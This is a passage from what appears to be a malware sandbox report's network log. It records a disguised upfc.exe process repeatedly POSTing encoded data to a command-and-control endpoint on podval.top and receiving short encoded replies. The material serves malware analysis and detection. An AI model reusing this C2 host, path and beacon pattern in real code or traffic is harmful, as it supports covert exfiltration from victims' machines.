                                                    Jul 3, 2024 16:43:21.573498964 CEST | 1060 | OUT | Data Raw: 5a 51 5a 58 5b 5f 52 5c 58 56 55 51 50 5b 59 57 55 5e 5e 54 51 5e 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZQZX[_R\XVUQP[YWU^^TQ^S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'*83?' 7)#=!Z.-6'C:3/T;+Z"!(^/"['$Y -
                                                    Jul 3, 2024 16:43:21.702276945 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:22.047570944 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:21 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cgaILiKP2xo6XjNeNlV3BkaHhg5DowG4J%2F4wdSKftXn7%2BiSoIrnA30D079WNnibwL2s0PLIF%2BrVko6VN2Mf3ESax%2BHutf4ChwDP50uaGhzCWypzlZmy42TPzug%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5bc5e5e4397-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    93 | 192.168.2.10 | 49811 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:22.177994967 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:22.526947021 CEST | 1060 | OUT | Data Raw: 5f 50 5f 55 5e 5c 57 5f 58 56 55 51 50 50 59 56 55 50 5e 55 51 59 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_U^\W_XVUQPPYVUP^UQYS]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!2:,@$^'7[)X9#.%->'&3 /."2+,"['$Y


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    94 | 192.168.2.10 | 49812 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:22.534507990 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1756
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:22.891227007 CEST | 1756 | OUT | Data Raw: 5f 54 5f 5a 5b 58 57 5f 58 56 55 51 50 59 59 56 55 5e 5e 54 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_Z[XW_XVUQPYYVU^^TQZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"1':+\$V#[>7==..X$%!\%3;='7";"['$Y 1
                                                    Jul 3, 2024 16:43:22.996913910 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.338403940 CEST | 735 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DNEGdCYrgSl%2Fc%2BE3YHRD3t3r%2BhvtDyfepN1s52vEb%2FY2nEkSAbCHu58Th3ouYH4dWmkPEPaWqOjHzu08sCXGYbaJdDIYsc%2FEBhC6ChDdlh4ZFP%2BETpW9zsNNpP18"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c47bd67285-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5c 31 04 0c 05 25 32 2b 52 39 3d 24 0f 29 2e 3c 5c 2c 39 35 5f 28 1a 07 5d 2d 00 0b 0a 20 2a 0c 5b 28 02 20 58 26 23 3b 0f 35 1b 20 5b 04 1c 23 1f 3c 29 35 5e 3f 3b 24 0b 32 02 36 18 30 0e 3d 5d 24 38 3d 0d 27 3b 24 05 3f 5e 39 51 24 0b 23 13 29 06 29 07 2a 37 04 13 20 24 21 54 02 13 21 09 27 5b 3a 0c 21 20 3c 0f 32 0e 13 16 33 27 2f 19 30 30 32 55 2a 33 0c 52 30 31 30 5c 21 11 0d 55 26 3b 39 04 26 2e 3d 5b 23 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%\1%2+R9=$).<\,95_(]- *[( X&#;5 [#<)5^?;$260=]$8=';$?^9Q$#))*7 $!T!'[:! <23'/002U*3R010\!U&;9&.=[#8#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    95 | 192.168.2.10 | 49813 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:22.655508995 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:23.027967930 CEST | 1060 | OUT | Data Raw: 5a 57 5f 58 5b 58 57 5d 58 56 55 51 50 5f 59 50 55 59 5e 59 51 5d 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZW_X[XW]XVUQP_YPUY^YQ]S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%9<C'_;37=&#5],>9]&550#$,( 0Z8,"['$Y =
                                                    Jul 3, 2024 16:43:23.116039038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:23.479872942 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:23 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6xLZ36AIf0CEPShtB%2BZ9ZU4wZcZ9RIqLotvqzxwGQFnhrSWWqZjButwVjF0mU9X7lXskrcBxWfNGh3QXwTEuFvpV6CjVZsYJoGWOXYsdU2dCYfO%2FMkQkR8PtbDId"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5c539337d06-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    96 | 192.168.2.10 | 49814 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:23.607089043 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:23.964037895 CEST | 1060 | OUT | Data Raw: 5f 54 5f 5f 5b 5f 57 5c 58 56 55 51 50 5e 59 5a 55 5f 5e 5a 51 5f 53 5d 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T__[_W\XVUQP^YZU_^ZQ_S]SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&_8E&)'Y0+]>& )Y-93%.'4,>, "4;<"['$Y
                                                    Jul 3, 2024 16:43:24.072427988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:24.278676987 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toaOkGB581Z69vz5TD3L4gUoxPbJJQBxOw42%2BSGoozKFyjHaKLmqcsyGX22%2BGL4zbF63OIYK%2BeKDXgWDm80FXSNtbFXiJZWNY6BLrzy71hZoxrbDo0gcGPf7MmwR"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5cb296f7d0b-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    97 | 192.168.2.10 | 49815 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:24.408545971 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:24.761101007 CEST | 1060 | OUT | Data Raw: 5f 55 5a 5c 5e 5b 52 5a 58 56 55 51 50 5d 59 5a 55 5d 5e 5b 51 5d 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _UZ\^[RZXVUQP]YZU]^[Q]S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"&+');Y% (.T 5\9!]$%'#8>;_48/"['$Y 5
                                                    Jul 3, 2024 16:43:24.854747057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:25.106900930 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr2Md1z827y8%2Fk74Bcs40JnJxbhufjvOyzpVSjMSd1O2ZkZNeO5EgeRwZRPKta%2FJ5yVgdajUYDU3HSu4uFZ2e%2BHHdnFS09%2FItQtuh1sgPTT%2FVQns66fDaS7pwjlJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d01d530cac-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    98 | 192.168.2.10 | 49816 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:25.407663107 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:25.760763884 CEST | 1060 | OUT | Data Raw: 5f 56 5f 55 5b 57 52 5a 58 56 55 51 50 5c 59 5b 55 5d 5e 5a 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_U[WRZXVUQP\Y[U]^ZQ_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)039?3']>>759..3'R/X?["!$Z/,"['$Y 1
                                                    Jul 3, 2024 16:43:26.247201920 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.248425007 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:26.320358992 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipXHnOiFpITk479CijatE6D5F5Va5Q4SgagqflODN%2BGcE2W8Xyg%2FwX2V5yR6RlColvbHPjYoNYe7zezqOwu1Z5E3HxGRmJrbnrncf93s0wjj93CxxdaQ2bOpb8Sd"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5d70b198c27-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    99 | 192.168.2.10 | 49817 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:26.452852964 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:26.807116985 CEST | 1056 | OUT | Data Raw: 5f 50 5f 5c 5b 58 57 5b 58 56 55 51 50 59 59 5b 55 59 5e 5e 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_\[XW[XVUQPYY[UY^^QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]%#'),$(-)V >%-"'C=]'3?->< ;,,"['$Y
                                                    Jul 3, 2024 16:43:26.912893057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:27.123236895 CEST | 574 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Blfmp0KnClBVNHvGXM8qRZpy3wbadB52Yj9oIOkso6T9mgsUpbBIedwohGO4ro31zDKlQFzhcrCLT6j74Kh32BgWq34Mh3AjnsqZ664VwRc14FUEsVmP3Qa426RX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5dcedc619ae-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    100 | 192.168.2.10 | 49818 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:27.246829033 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:27.603986979 CEST | 1060 | OUT | Data Raw: 5f 56 5f 59 5b 5c 52 5f 58 56 55 51 50 58 59 5b 55 5f 5e 58 51 5d 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_Y[\R_XVUQPXY[U_^XQ]SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!1#'#$04>9W7%X.>%\'Y$3$/-<4X;"['$Y !
                                                    Jul 3, 2024 16:43:27.723054886 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:28.065099955 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHjbiMiU2Trpr7w9gGBTI%2BirtkaIEgXbuMd08lrpcvx9WY47OLq%2F3RNuPeDry9lGDt8rVDGdEY3PY%2FC2pYMRGgs%2BjH48usK5%2BGPRtlcPd5Tg5Y5FSta3K%2BNNtYGo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e1fd7342e9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    101 | 192.168.2.10 | 49819 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:28.193630934 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    102 | 192.168.2.10 | 49820 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:28.362648010 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:28.713335037 CEST | 1748 | OUT | Data Raw: 5f 54 5f 5b 5b 5c 57 59 58 56 55 51 50 50 59 5a 55 58 5e 54 51 54 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_[[\WYXVUQPPYZUX^TQTSWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\&,E0(33?=>&!=.-9Z&5337T8X7!4^/"['$Y
                                                    Jul 3, 2024 16:43:28.816402912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:29.164091110 CEST | 727 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:29 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3uJLJLD4DkQRQH3vZlBusgcAeFDW%2BQyfizKmHQesESG8AoOa1PMQU4C57q0r1BbLjIt9FSjwmu34CDzYhesxzjGSm%2FhUCfWetb8dTJma3SFvI6tx7wjqiWmFp6X"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5e8def15e7d-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 5d 26 29 2d 1e 25 22 2f 1b 39 3d 33 57 29 3d 28 59 2c 17 2d 16 2a 37 2a 01 3a 00 35 08 34 3a 0f 04 2b 05 2c 5c 31 23 3c 55 23 21 20 5b 04 1c 23 11 3f 29 35 12 28 28 24 0a 24 3c 21 08 25 27 29 1e 33 28 2d 0d 33 06 09 1f 28 01 25 50 30 31 2f 58 2b 28 31 06 3c 09 08 5e 21 24 21 54 02 13 22 1c 24 3e 35 55 34 33 37 52 27 30 21 14 33 24 2c 0a 30 33 2a 52 29 20 22 55 26 31 3c 5a 22 59 34 0a 33 28 26 16 27 3e 25 11 23 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%]&)-%"/9=3W)=(Y,-*7*:54:+,\1#<U#! [#?)5(($$<!%')3(-3(%P01/X+(1<^!$!T"$>5U437R'0!3$,03*R) "U&1<Z"Y43(&'>%#(#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    103 | 192.168.2.10 | 49821 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:28.499655008 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:28.854458094 CEST | 1060 | OUT | Data Raw: 5a 57 5a 5f 5b 59 57 5d 58 56 55 51 50 5c 59 53 55 59 5e 5d 51 55 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
